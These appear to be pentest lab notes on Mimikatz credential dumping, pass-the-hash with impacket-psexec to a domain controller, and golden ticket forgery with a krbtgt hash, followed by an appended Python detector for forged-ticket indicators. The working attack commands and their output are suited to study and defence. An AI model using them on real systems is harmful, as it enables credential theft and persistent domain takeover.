Golden Ticket Attacks
PRACTICE ! PRACTICE ! PRACTICE !
What is Mimikatz
A post-exploitation tool used to view and steal credentials, generate Kerberos tickets, and carry out the attacks built on them.
It dumps credentials stored in memory. Possible attacks with Mimikatz:
Credential Dumping
Pass-The-Hash
Over-Pass-The-Hash
Pass-The-Ticket
Golden Ticket
Silver Ticket
Credential Dumping using Mimikatz
mimikatz# privilege::debug // Requests SeDebugPrivilege so Mimikatz can read LSASS memory
mimikatz# sekurlsa::logonpasswords
mimikatz# lsadump::sam
mimikatz# lsadump::sam /patch
mimikatz# lsadump::lsa /patch

Administrator's NTLM hash - 8d657f0e83858757657fc60dbf57c15d
We can now psexec into the DC using the NTLM hash. But wait, psexec requires the NT hash and LM hash separately, right? I don't know if I'm correct, but I just repeated the same NTLM hash for both and it worked :)
$ impacket-psexec marvel.local/administrator@192.168.169.147 -hashes 8d657f0e83858757657fc60dbf57c15d:8d657f0e83858757657fc60dbf57c15d
Impacket v0.10.1.dev1+20230511.22548.197c14bd - Copyright 2022 Fortra
[*] Requesting shares on 192.168.169.147.....
[*] Found writable share ADMIN$
[*] Uploading file QcqliVUn.exe
[*] Opening SVCManager on 192.168.169.147.....
[*] Creating service xkdY on 192.168.169.147.....
[*] Starting service xkdY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> echo %username%
HYDRA-DC$
Golden Ticket Attacks
This attack is mainly used for persistence. Put simply, we take the key of the default Kerberos TGT account (krbtgt) and use it to generate our own golden tickets, which is also the stealthier option :)
mimikatz# privilege::debug
mimikatz# lsadump::lsa /inject /name:krbtgt

Important things to note down
The SID =>
S-1-5-21-3353711819-682220578-791151302
NTLM Hash of the user krbtgt =>
92c380ff77ec1e13f38a9ed5609ff591
Now let's generate some golden tickets by abusing the krbtgt account :)
mimikatz# kerberos::golden /User:fakeuser /domain:marvel.local /sid:S-1-5-21-3353711819-682220578-791151302 /krbtgt:92c380ff77ec1e13f38a9ed5609ff591 /id:500 /ptt
User : fakeuser
Domain : marvel.local (MARVEL)
SID : S-1-5-21-3353711819-682220578-791151302
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 92c380ff77ec1e13f38a9ed5609ff591 - rc4_hmac_nt
Lifetime : 5/11/2023 5:08:54 AM ; 5/8/2033 5:08:54 AM ; 5/8/2033 5:08:54 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'fakeuser @ marvel.local' successfully submitted for current session
mimikatz# misc::cmd
Patch OK for 'cmd.exe'
Now we can open a cmd via Mimikatz and run psexec.exe from it to move laterally or pivot within the network!
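The ticket above leaves three traces a defender can look for: the name fakeuser exists nowhere in the directory while its SID ends in RID 500 (Administrator), the service key is rc4_hmac_nt (assumed here to differ from a domain whose accounts use AES keys), and the forged TGT was never issued by the KDC, so no AS-REQ precedes its use. The following is an added example, not part of these notes, that runs those checks over constructed Security-log events; the field names, the directory snapshot and the 10-hour TGT lifetime are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events modelled on the ticket shown above (fakeuser, RID 500,
# rc4_hmac_nt). Event IDs follow the Windows Security log: 4768 = TGT issued,
# 4769 = service ticket issued, 4624 = logon. Field names are assumed.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2023-05-11T04:50:00", "account": "frank", "etype": 0x12},
    {"id": 4769, "time": "2023-05-11T05:01:00", "account": "frank", "etype": 0x12,
     "sid": "S-1-5-21-3353711819-682220578-791151302-1104"},
    # No 4768 for fakeuser: the TGT was forged offline and presented directly.
    {"id": 4769, "time": "2023-05-11T05:10:00", "account": "fakeuser", "etype": 0x17,
     "sid": "S-1-5-21-3353711819-682220578-791151302-500"},
    {"id": 4624, "time": "2023-05-11T05:10:05", "account": "fakeuser",
     "sid": "S-1-5-21-3353711819-682220578-791151302-500"},
]
# Constructed directory snapshot (RID -> sAMAccountName) and the assumed domain
# default ticket encryption type: 0x12 = AES256-CTS-HMAC-SHA1-96, 0x17 = RC4-HMAC.
KNOWN_ACCOUNTS = {500: "Administrator", 1104: "frank"}
EXPECTED_ETYPE = 0x12

def detect_golden_ticket_indicators(events, known_accounts, expected_etype, max_tgt_hours=10):
    """Return (account, reason) pairs for events that look like use of a forged TGT."""
    findings = []
    tgt_issued = {}  # account -> time of the last observed 4768 (AS-REQ) for it
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        acct = ev["account"]
        if ev["id"] == 4768:
            tgt_issued[acct] = t
            continue
        if ev["id"] == 4769:
            last = tgt_issued.get(acct)
            if last is None or t - last > timedelta(hours=max_tgt_hours):
                findings.append((acct, "TGS request without a preceding AS-REQ within TGT lifetime"))
            if ev["etype"] != expected_etype:
                findings.append((acct, f"ticket etype 0x{ev['etype']:x} differs from domain default"))
        if ev["id"] in (4769, 4624):
            # The PAC carries the forged name, but the SID's RID resolves to a real account.
            rid = int(ev["sid"].rsplit("-", 1)[1])
            real = known_accounts.get(rid)
            if real is None or real.lower() != acct.lower():
                findings.append((acct, f"account name {acct!r} does not match RID {rid} ({real})"))
    return findings

if __name__ == "__main__":
    for account, reason in detect_golden_ticket_indicators(SAMPLE_EVENTS, KNOWN_ACCOUNTS, EXPECTED_ETYPE):
        print(f"[!] {account}: {reason}")
```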